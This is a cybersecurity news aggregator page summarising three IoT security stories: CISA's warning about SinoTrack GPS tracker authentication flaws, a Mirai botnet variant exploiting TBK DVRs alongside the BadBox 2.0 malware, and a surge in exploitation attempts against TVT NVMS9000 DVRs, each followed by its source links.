CyberSecurity news

FlagThis - #iotsecurity

Pierluigi Paganini@Security Affairs //
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning regarding two critical vulnerabilities discovered in SinoTrack GPS devices. These flaws could allow malicious actors to remotely control vehicles and track their locations. The vulnerabilities affect all known SinoTrack devices and the SinoTrack IOT PC Platform. This alert follows the disclosure of these security weaknesses by independent researcher Raúl Ignacio Cruz Jiménez.

The identified vulnerabilities include a weak authentication flaw (CVE-2025-5484) and an observable response discrepancy (CVE-2025-5485). The weak authentication stems from the use of a default password across all devices and the use of the device identifier as the username. The identifier, which is printed on the receiver, is easily accessible, either through physical access to the device or through images posted online. The observable response discrepancy arises from the numerical structure of usernames, which are up to 10 digits long. This enables attackers to guess valid usernames by trying different number sequences.

Successful exploitation of these vulnerabilities could grant attackers unauthorized access to device profiles through the web management interface. This access could then be used to perform remote functions on connected vehicles, such as tracking the vehicle's location and, in some cases, disconnecting power to the fuel pump. With a CVSS v4 score of 8.8, CVE-2025-5485 is considered highly severe. While there are currently no official fixes available, CISA advises users to change the default password immediately and to conceal the device identifier, particularly in publicly accessible photographs. SinoTrack has not yet responded to CISA’s request.

Share: bluesky twitterx--v2 facebook--v1 threads


References :
  • hackread.com: US CISA reports critical vulnerabilities in SinoTrack GPS devices that could let attackers remotely control vehicles and track locations.
  • securityaffairs.com: Two vulnerabilities in SinoTrack GPS devices can allow remote vehicle control and location tracking by attackers, US CISA warns.
  • The Hacker News: Two security vulnerabilities have been disclosed in SinoTrack GPS devices that could be exploited to control certain remote functions on connected vehicles and even track their locations.
  • ciso2ciso.com: CISA Warns of Remote Control Flaws in SinoTrack GPS Trackers – Source:hackread.com
  • thecyberexpress.com: US CISA reports critical vulnerabilities in SinoTrack GPS devices that could let attackers remotely control vehicles and track locations
  • www.helpnetsecurity.com: SinoTrack GPS vulnerabilities may allow attackers to track, control vehicles
Classification:
  • HashTags: #GPS #VehicleSecurity #IoT
  • Company: SinoTrack
  • Target: Vehicles
  • Product: SinoTrack GPS
  • Feature: Weak Authentication
  • Type: IoT
  • Severity: Critical
Mike Moore@techradar.com //
A new wave of cyberattacks is targeting Internet of Things (IoT) devices through both the Mirai botnet and BadBox 2.0 malware. Cybersecurity researchers have discovered a new variant of the Mirai botnet that exploits a critical vulnerability, CVE-2024-3721, in TBK DVR devices. This vulnerability allows attackers to remotely deploy malicious code on digital video recording systems commonly used for surveillance. Kaspersky GReAT experts have described the new features of this Mirai variant, noting that the latest botnet infections specifically target TBK DVR devices.

Simultaneously, the FBI has issued a warning about the dangerous BadBox 2.0 malware, which has already infected over a million devices, including smart TVs, streaming boxes, digital projectors, and tablets. These devices, often cheap, off-brand, Android-powered units, are being hijacked to form a global botnet used for malicious activities such as ad fraud, click fraud, and distributed denial-of-service (DDoS) attacks. The compromised devices are turned into residential proxies, which are then sold or provided for free to cybercriminals, enabling a wide range of illicit activities.

The Mirai botnet leverages a vulnerability in TBK DVR devices, enabling unauthorized system command execution. Attackers send targeted POST requests to vulnerable endpoints, containing encoded shell commands to download and execute ARM32 binary payloads. This streamlined approach allows for efficient infection, bypassing traditional reconnaissance phases. Meanwhile, BadBox 2.0 often comes preloaded on devices or is transferred through malicious firmware updates and Android applications. Once infected, devices become part of a botnet that cybercriminals exploit for various nefarious purposes, highlighting the persistent threat IoT devices pose to cybersecurity.

Share: bluesky twitterx--v2 facebook--v1 threads


References :
  • cyberpress.org: New Mirai Botnet Variant Exploits TBK DVR Vulnerability to Deploy Malicious Code
  • The Record: TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.
  • Securelist: Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721
  • cyberinsider.com: New Mirai Botnet Variant Targets Flaw in 50,000 Exposed TBK DVRs
  • therecord.media: TV streaming devices, digital projectors and other IoT devices are being infected with BadBox 2.0 malware after the original campaign was stifled by German law enforcement.
  • Cyber Security News: Cybersecurity researchers have discovered a new variant of the notorious Mirai botnet that exploits a critical vulnerability in TBK DVR devices to deploy malicious code remotely.
  • gbhackers.com: New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution
  • securityonline.info: New Mirai Botnet Variant Targets DVR Systems via CVE-2024-3721
  • securityonline.info: New Mirai Botnet Variant Targets DVR Systems via CVE-2024-3721
  • gbhackers.com: New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution
  • www.bleepingcomputer.com: A new variant of the Mirai malware botnet is exploiting a command injection vulnerability in TBK DVR-4104 and DVR-4216 digital video recording devices to hijack them.
  • CyberInsider: New Mirai Botnet Variant Targets Flaw in 50,000 Exposed TBK DVRs
  • securityaffairs.com: BadBox 2.0 botnet infects millions of IoT devices worldwide, FBI warns
  • securityaffairs.com: New Mirai botnet targets TBK DVRs by exploiting CVE-2024-3721
Classification:
@securityonline.info //
GreyNoise has observed a significant surge, approximately three times the typical level, in exploitation attempts targeting TVT NVMS9000 DVRs. The peak of this activity occurred on April 3, 2025, with over 2,500 unique IP addresses involved in scanning for vulnerable devices. This vulnerability is an information disclosure flaw that allows attackers to gain administrative control over affected systems, essentially bypassing authentication and executing commands without restriction. Countless prior reports have identified the TVT NVMS9000 DVR as a target for botnet recruitment, including a GreyNoise update in early March 2025.

The exploitation activity is strongly suspected to be associated with the Mirai botnet, a notorious threat known for targeting vulnerabilities in IoT devices. GreyNoise has identified sufficient overlap with Mirai to support this attribution. Manufactured by TVT Digital Technology Co., Ltd., based in Shenzhen, the NVMS9000 DVRs are used in security and surveillance systems for recording, storing, and managing video footage from security cameras. The company reports serving customers in over 120 countries.

The majority of the malicious IP addresses involved in the exploitation attempts originate from the Asia-Pacific (APAC) region, specifically Taiwan, Japan, and South Korea. However, the top target countries are the United States, United Kingdom, and Germany. Organizations using the NVMS9000 DVR or similar systems are advised to take immediate action to secure their devices. Recommended mitigations include blocking known malicious IP addresses, applying all available patches, restricting public internet access to DVR interfaces, and closely monitoring network traffic for signs of unusual scanning or exploitation attempts.

Share: bluesky twitterx--v2 facebook--v1 threads


References :
  • The GreyNoise Blog: GreyNoise Observes 3X Surge in Exploitation Attempts Against TVT DVRs — Likely Mirai
  • bsky.app: New Mirai botnet behind surge in TVT DVR exploitation
  • BleepingComputer: New Mirai botnet behind surge in TVT DVR exploitation
  • securityonline.info: TVT DVRs Under Siege: Massive Exploitation Attempts Expose Critical Flaw
  • The DefendOps Diaries: Explore the resurgence of the Mirai botnet, its global impact, and advanced exploitation techniques targeting IoT devices.
  • Cyber Security News: GreyNoise has detected a significant rise in exploitation attempts targeting TVT NVMS9000 DVRs, a line of digital video recorders primarily used in security and surveillance systems.
  • www.scworld.com: Deluge of TVT DVR exploitation attempts likely due to Mirai-based botnet
  • bsky.app: A significant spike in exploitation attempts targeting TVT NVMS9000 DVRs has been detected, peaking on April 3, 2025, with over 2,500 unique IPs scanning for vulnerable devices.
  • cyberpress.org: Mirai Botnet Variant Targets TVT DVRs to Seize Administrative Control
Classification: